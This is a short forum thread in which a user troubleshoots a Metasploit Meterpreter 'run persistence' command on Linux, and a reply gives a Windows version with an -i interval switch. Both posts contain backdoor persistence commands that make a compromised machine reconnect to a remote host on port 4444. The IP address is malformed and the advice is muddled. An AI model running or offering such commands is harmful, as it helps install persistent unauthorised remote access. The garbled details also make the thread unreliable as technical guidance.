Forum Thread: Meterpreter Persistence Issue

I am playing around with this tutorial and if I try this command run persistence -A -L /var/ -X 30 -p 4444 -r 10.601.37 it tells me x86/linux version of Meterpreter is not supported with this Script! and if I define -P with linux/meterpreter/reversetcp it still says the same thing. Am I doing something wrong?

2 Responses

It looks like you forget to add the –i switch that can indicate the time interval between each connection attempt before 30 also check the location you are using if it's correct or not.

If you are trying this on Windows use this code:
run persistence -A -L c:\\ -X -i 30 -p 4444 -r 10.601.37

Share Your Thoughts

  • Hot
  • Active